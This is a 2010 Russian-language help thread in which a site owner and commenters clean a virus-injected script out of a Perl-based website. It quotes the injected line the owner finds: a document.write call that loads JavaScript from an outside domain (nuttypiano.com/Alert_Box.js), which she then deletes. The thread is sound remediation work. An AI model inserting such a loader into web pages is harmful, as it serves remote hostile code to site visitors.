10:03

I see you
[ok]

Уважаемые эксперты, обращаюсь с вопросом о вирусе...
на сайте, который размещен на хостинге nic.ru, завелся вирус. читать дальше



точно такое же сообщение появляется, когда я захожу в админку сайта

P.S. я впервые сталкиваюсь с подобной проблемой, поэтому боюсь, мне нужны пошаговые инструкции

Этапы решения:
читать дальше

UPD: не знаю, связано ли это с вирусом, но: вчера я поменяла все пароли от админки. Сегодня при попытке войти под этим паролем, я вижу странное сообщение "добро пожаловать. нажмите здесь чтобы вернуться обратно" - и меня обратно перекидывает на страницу с формами для ввода пароля. при этом если ввести пароль неправильно, то этого сообщения я не вижу, просто остаюсь на той же странице.
читать дальше
спасибо, проблема оказалась не в админке. на другом браузере все работает

Комментарии
28.08.2010 в 11:54

Реальный мир ужасен, виртуальный - загадочен...
Как может антивирус найти вирусы в выкачанных с сайта скриптах? Вручную надо искать. Глазами. Смотреть по дате изменения файлов. Вы же помните когда в последний раз меняли что-то на сайте - на эту дату и ориентируйтесь. Можете просто загрузить последний незавирусованный вариант сайта.
Пароль мог быть перехвачен с помощью шпионских программ, вирусов.

Что это за скрипт, который выводится в сообщении антивируса? Явно открывает на сайте окно с вирусным компонентом.
28.08.2010 в 12:02

I see you
выкачивание скриптов - это был совет службы техподдержки хостинга...
к сожалению, последний незавирусованный вариант выложить не могу, копию делала довольно давно, а на сайте постоянно появляются обновления, новые сообщения , файлы загружаются. или это не влияет на дату изменения скриптов?

читать дальше

вы не могли бы посоветовать, что я могу сделать в связи с сообщением антивируса?

я впервые сталкиваюсь с такой пробелмой, поэтому, боюсь, мне нужна пошаговая инструкция.
28.08.2010 в 12:25

1) попробуйте поискать ссылки на alert_box.js в ваших исходниках, если найдете - удалите
2) смените пароль к сайту
3) не храните пароль в тотал коммандере :)
28.08.2010 в 12:26

Реальный мир ужасен, виртуальный - загадочен...
Движок сайта, в который входят скрипты, шаблоны страниц, файлы настроек, не меняется при появлении новых сообщений, загрузке файлов и т.д. Обычно все распределено по папкам. Скрипты в своей папке, загружаемые файлы - в своей. Сообщения хранятся в базе MySQL и недоступны через ftp.
По ссылке из аваста у вас скрипт лежит прямо в корневой папке сайта. Обычно такого не бывает.
На даты смотрите и разбирайтесь. Сохраните текущую ftp-версию сайта на всякий пожарный. Далее замените файлы скриптов на старые. Лишние удалите.
28.08.2010 в 12:39

I see you
Reuniko
1. с исходниками проблема - сайт написан на перле, там нет файлов которые мне знакомы по "работе" с сайтами сделанными целиком на html, например, у меня нет файла index.html при доступе по фтп. если честно, я вообще глядя на структуру сайта по ftp, слабо понимаю где у меня что
2. вс епароли тут же сменила - и фтпшные. и админские
3. пароль нигде не сохранен, только у меня в голове...

LAV ©
структура сайта для меня ужасно необычная.. дело в том что в "корне" у меня лежат папки: cgi, conf, docs и файлы errordocs, logs, php, stst.
и как мне сказал разработчик сайта - каталог docs не цчитывается в адресе файла, то есть если файл file положить в папку docs, то ссылка будет admil.ru/file, а не admil.ru/docs/file

попробую позаменять файлы скриптов на старые. и правда. .как только вытащу из комы тот компьютер, на котором у меня копия сайта..
скрипты лежат только в папке cgi?
28.08.2010 в 12:44

В винде есть вкуснейшая функция: поиск внутри файлов вглубь папки, ваше дело лишь найти зараженные файлы, найти внутри них вхождения alert_box.js и поделять его нафиг. Замена движка на старую версию, разумеется, будет много лучше.
28.08.2010 в 12:49

I see you
Reuniko я попробую, спасибо.. то есть я выкачиваю весь сайт по фтп, и в поиске windows задаю поиск по фразе в файле, правильно?
извините что переспрашиваю, но я очень неуверенно сбя чувствую в компьютерной терминологии.
какого черта мы тогда согласились на этот перл, в котором руками личн оя ничег осделать не могу..
28.08.2010 в 12:56

Реальный мир ужасен, виртуальный - загадочен...
Hemem, значит корневой папкой является docs. Остальные можно не смотреть.
28.08.2010 в 13:03

I see you
LAV © ага. спасибо. попробую сделать сначала как сказала Реюнико, а потом буду искать старую версию сайта...
заранее вопрос - если я не найду старых скриптов(не знаю, удастся ли выскрести старую версию из компа, на который я ее скачивала), что я могу сделать?
28.08.2010 в 13:05

ಠ-ಠ
может, дадите ссылку на сайт?
28.08.2010 в 13:07

I see you
я боялась что это будет сочтено рекламой. =)
www.admil.ru
28.08.2010 в 13:30

I see you
в одном из файлов нашла строку в одном из файлов нашла строку
document. write('< sc'+' ript type="text/javasсript" src="nuttypiano.com/Alert_Box. js">');

в самом конце файла. какую часть нужно удалить?
28.08.2010 в 13:38

Реальный мир ужасен, виртуальный - загадочен...
полностью удалить всю строку
28.08.2010 в 13:58

I see you
спасибо огромное! сообщение о вирусе не появляется.
29.08.2010 в 11:54

Прежде чем испробовать достичь цели - я хочу запомнить этот мир целым ©
29.08.2010 в 13:01

I see you
время правильное, куки почистила, все еще выкиывает.
но с ругого компа- открывается, так что я спокойна, что проблема не в сайте и не в вирусе и не в логине. спасибо огромное!
29.08.2010 в 13:23

Прежде чем испробовать достичь цели - я хочу запомнить этот мир целым ©
Проверьте на другом браузере
29.08.2010 в 16:40

I see you
на фаерфоксе работает. спасибо. я перепугалась, что проблема в админке. это было бы серьезнее..